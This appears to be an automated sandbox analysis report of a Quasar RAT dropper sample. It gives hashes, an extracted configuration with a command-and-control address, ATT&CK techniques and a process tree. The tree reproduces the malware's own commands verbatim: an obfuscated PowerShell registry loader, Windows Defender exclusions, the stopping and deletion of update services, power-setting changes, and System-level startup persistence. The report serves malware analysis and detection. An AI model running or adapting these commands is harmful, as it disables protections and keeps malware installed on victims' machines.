quasar | 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-12-2024 11:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
Size

6.0MB
MD5

fcd7f27674626fbf8bcce5b0e991c03d
SHA1

143515e84e3b48e5bc5286d819f8fd10b8eb5685
SHA256

7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394
SHA512

3464f2200c9eedd17872842b2336786360b34a4bb2f0709b29cb1a8f794b437532193275b43378149424e2d651dba66657d850ccb37e613cb73e76d8a36b98f6
SSDEEP

98304:j3Go5BKtxo5fQIwuhk/UwalC+i0bBHXGgjaQx+OhfzTxzdloaDW:j3GozKYAEk9oCj0bR2Ej1hbTxkJ

Score

10^/10

quasar 4drun evasion execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes

encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
3dfx Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023cbd-22.dat	family_quasar
behavioral2/memory/436-31-0x0000000000D30000-0x0000000000DB4000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2528	powershell.exe
1900	powershell.exe
2404	powershell.exe
4804	powershell.exe
3596	powershell.exe
1880	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe

Executes dropped EXE 5 IoCs

pid	Process
4848	doihdjpihrekpoh.exe
3708	mklnsegsd.exe
436	ergbuiluyfd.exe
4688	Client.exe
1692	kaptsegthwf.exe

Power Settings 1 TTPs 18 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4932	powercfg.exe
4868	powercfg.exe
3528	powercfg.exe
3376	powercfg.exe
5092	cmd.exe
5072	powercfg.exe
3188	powercfg.exe
1628	cmd.exe
1832	powercfg.exe
4808	powercfg.exe
1860	powercfg.exe
3948	powercfg.exe
4472	powercfg.exe
3088	powercfg.exe
8	powercfg.exe
3872	powercfg.exe
1396	powercfg.exe
2892	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	doihdjpihrekpoh.exe
File opened for modification	C:\Windows\System32\Tasks\Barac	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc32	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc64	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4848 set thread context of 4256	4848	doihdjpihrekpoh.exe	128
PID 3708 set thread context of 1008	3708	mklnsegsd.exe	152

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Cuis\bon\Bara.exe	mklnsegsd.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3668	sc.exe
2836	sc.exe
4512	sc.exe
2728	sc.exe
2788	sc.exe
3892	sc.exe
4008	sc.exe
2172	sc.exe
4244	sc.exe
1372	sc.exe
3172	sc.exe
1300	sc.exe
2464	sc.exe
4704	sc.exe
1836	sc.exe
664	sc.exe
2036	sc.exe
3876	sc.exe
2548	sc.exe
5036	sc.exe
2748	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
676	WMIC.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3196	schtasks.exe
4060	schtasks.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
4848	doihdjpihrekpoh.exe
2528	powershell.exe
2528	powershell.exe
1900	powershell.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
1900	powershell.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
3596	powershell.exe
4848	doihdjpihrekpoh.exe
3596	powershell.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
4256	dialer.exe
4256	dialer.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
4848	doihdjpihrekpoh.exe
1692	kaptsegthwf.exe
4256	dialer.exe
4256	dialer.exe
2404	powershell.exe
2404	powershell.exe
2404	powershell.exe
4256	dialer.exe
4256	dialer.exe
3596	powershell.exe
4256	dialer.exe
4256	dialer.exe
4256	dialer.exe
4256	dialer.exe
4256	dialer.exe
4256	dialer.exe
2404	powershell.exe
4256	dialer.exe
4256	dialer.exe
4256	dialer.exe
4256	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	436	ergbuiluyfd.exe
Token: SeDebugPrivilege	4688	Client.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeShutdownPrivilege	1832	powercfg.exe
Token: SeCreatePagefilePrivilege	1832	powercfg.exe
Token: SeDebugPrivilege	4848	doihdjpihrekpoh.exe
Token: SeDebugPrivilege	4256	dialer.exe
Token: SeShutdownPrivilege	1396	powercfg.exe
Token: SeCreatePagefilePrivilege	1396	powercfg.exe
Token: SeShutdownPrivilege	4932	powercfg.exe
Token: SeCreatePagefilePrivilege	4932	powercfg.exe
Token: SeShutdownPrivilege	4808	powercfg.exe
Token: SeCreatePagefilePrivilege	4808	powercfg.exe
Token: SeShutdownPrivilege	3872	powercfg.exe
Token: SeCreatePagefilePrivilege	3872	powercfg.exe
Token: SeShutdownPrivilege	1860	powercfg.exe
Token: SeCreatePagefilePrivilege	1860	powercfg.exe
Token: SeShutdownPrivilege	3528	powercfg.exe
Token: SeCreatePagefilePrivilege	3528	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3596	powershell.exe
Token: SeSecurityPrivilege	3596	powershell.exe
Token: SeTakeOwnershipPrivilege	3596	powershell.exe
Token: SeLoadDriverPrivilege	3596	powershell.exe
Token: SeSystemProfilePrivilege	3596	powershell.exe
Token: SeSystemtimePrivilege	3596	powershell.exe
Token: SeProfSingleProcessPrivilege	3596	powershell.exe
Token: SeIncBasePriorityPrivilege	3596	powershell.exe
Token: SeCreatePagefilePrivilege	3596	powershell.exe
Token: SeBackupPrivilege	3596	powershell.exe
Token: SeRestorePrivilege	3596	powershell.exe
Token: SeShutdownPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeSystemEnvironmentPrivilege	3596	powershell.exe
Token: SeRemoteShutdownPrivilege	3596	powershell.exe
Token: SeUndockPrivilege	3596	powershell.exe
Token: SeManageVolumePrivilege	3596	powershell.exe
Token: 33	3596	powershell.exe
Token: 34	3596	powershell.exe
Token: 35	3596	powershell.exe
Token: 36	3596	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeIncreaseQuotaPrivilege	3596	powershell.exe
Token: SeSecurityPrivilege	3596	powershell.exe
Token: SeTakeOwnershipPrivilege	3596	powershell.exe
Token: SeLoadDriverPrivilege	3596	powershell.exe
Token: SeSystemProfilePrivilege	3596	powershell.exe
Token: SeSystemtimePrivilege	3596	powershell.exe
Token: SeProfSingleProcessPrivilege	3596	powershell.exe
Token: SeIncBasePriorityPrivilege	3596	powershell.exe
Token: SeCreatePagefilePrivilege	3596	powershell.exe
Token: SeBackupPrivilege	3596	powershell.exe
Token: SeRestorePrivilege	3596	powershell.exe
Token: SeShutdownPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeSystemEnvironmentPrivilege	3596	powershell.exe
Token: SeRemoteShutdownPrivilege	3596	powershell.exe
Token: SeUndockPrivilege	3596	powershell.exe
Token: SeManageVolumePrivilege	3596	powershell.exe
Token: 33	3596	powershell.exe
Token: 34	3596	powershell.exe
Token: 35	3596	powershell.exe
Token: 36	3596	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3708	mklnsegsd.exe
4688	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1680 wrote to memory of 4848	1680	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	82
PID 1680 wrote to memory of 4848	1680	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	82
PID 1680 wrote to memory of 3708	1680	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	84
PID 1680 wrote to memory of 3708	1680	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	84
PID 1680 wrote to memory of 436	1680	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	85
PID 1680 wrote to memory of 436	1680	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	85
PID 436 wrote to memory of 4060	436	ergbuiluyfd.exe	86
PID 436 wrote to memory of 4060	436	ergbuiluyfd.exe	86
PID 436 wrote to memory of 4688	436	ergbuiluyfd.exe	88
PID 436 wrote to memory of 4688	436	ergbuiluyfd.exe	88
PID 4688 wrote to memory of 3196	4688	Client.exe	89
PID 4688 wrote to memory of 3196	4688	Client.exe	89
PID 3708 wrote to memory of 1900	3708	mklnsegsd.exe	97
PID 3708 wrote to memory of 1900	3708	mklnsegsd.exe	97
PID 4824 wrote to memory of 4860	4824	cmd.exe	103
PID 4824 wrote to memory of 4860	4824	cmd.exe	103
PID 3708 wrote to memory of 4436	3708	mklnsegsd.exe	108
PID 3708 wrote to memory of 4436	3708	mklnsegsd.exe	108
PID 3708 wrote to memory of 1628	3708	mklnsegsd.exe	109
PID 3708 wrote to memory of 1628	3708	mklnsegsd.exe	109
PID 3708 wrote to memory of 3596	3708	mklnsegsd.exe	110
PID 3708 wrote to memory of 3596	3708	mklnsegsd.exe	110
PID 4436 wrote to memory of 4512	4436	cmd.exe	114
PID 4436 wrote to memory of 4512	4436	cmd.exe	114
PID 4436 wrote to memory of 3172	4436	cmd.exe	117
PID 4436 wrote to memory of 3172	4436	cmd.exe	117
PID 4436 wrote to memory of 2728	4436	cmd.exe	118
PID 4436 wrote to memory of 2728	4436	cmd.exe	118
PID 4436 wrote to memory of 3668	4436	cmd.exe	120
PID 4436 wrote to memory of 3668	4436	cmd.exe	120
PID 1628 wrote to memory of 1832	1628	cmd.exe	122
PID 1628 wrote to memory of 1832	1628	cmd.exe	122
PID 4436 wrote to memory of 664	4436	cmd.exe	123
PID 4436 wrote to memory of 664	4436	cmd.exe	123
PID 4848 wrote to memory of 4256	4848	doihdjpihrekpoh.exe	128
PID 4848 wrote to memory of 4256	4848	doihdjpihrekpoh.exe	128
PID 4848 wrote to memory of 4256	4848	doihdjpihrekpoh.exe	128
PID 4848 wrote to memory of 4256	4848	doihdjpihrekpoh.exe	128
PID 4848 wrote to memory of 4256	4848	doihdjpihrekpoh.exe	128
PID 4848 wrote to memory of 4256	4848	doihdjpihrekpoh.exe	128
PID 4848 wrote to memory of 4256	4848	doihdjpihrekpoh.exe	128
PID 4436 wrote to memory of 2680	4436	cmd.exe	135
PID 4436 wrote to memory of 2680	4436	cmd.exe	135
PID 1628 wrote to memory of 4808	1628	cmd.exe	136
PID 1628 wrote to memory of 4808	1628	cmd.exe	136
PID 4436 wrote to memory of 3876	4436	cmd.exe	139
PID 4436 wrote to memory of 3876	4436	cmd.exe	139
PID 1628 wrote to memory of 1860	1628	cmd.exe	140
PID 1628 wrote to memory of 1860	1628	cmd.exe	140
PID 4436 wrote to memory of 2508	4436	cmd.exe	145
PID 4436 wrote to memory of 2508	4436	cmd.exe	145
PID 1628 wrote to memory of 3528	1628	cmd.exe	146
PID 1628 wrote to memory of 3528	1628	cmd.exe	146
PID 4436 wrote to memory of 4320	4436	cmd.exe	148
PID 4436 wrote to memory of 4320	4436	cmd.exe	148
PID 4436 wrote to memory of 1380	4436	cmd.exe	151
PID 4436 wrote to memory of 1380	4436	cmd.exe	151
PID 4256 wrote to memory of 628	4256	dialer.exe	5
PID 4256 wrote to memory of 680	4256	dialer.exe	7
PID 4256 wrote to memory of 960	4256	dialer.exe	12
PID 4256 wrote to memory of 384	4256	dialer.exe	13
PID 4256 wrote to memory of 740	4256	dialer.exe	14
PID 4256 wrote to memory of 868	4256	dialer.exe	15
PID 4256 wrote to memory of 1092	4256	dialer.exe	17

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0dd28fd1-d14b-413c-b730-1b5a84caa6b9}
  2⤵
  PID:2692
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{47a8178a-1f5f-43b6-a2ad-246372153714}
  2⤵
  PID:4408

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1144
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2768
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:1332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:2244
- C:\Program Files\Cuis\bon\Bara.exe
  "C:\Program Files\Cuis\bon\Bara.exe"
  2⤵
  PID:704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4804
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4284
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2172
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4244
- - C:\Windows\system32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:5092
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:4472
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:3188
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:8
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1880
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe ujznpffbjbh
    3⤵
    PID:4484
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      4⤵
      PID:2332
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    PID:2912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Name, VideoProcessor
      4⤵
      Detects videocard installed
      PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1336
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1408

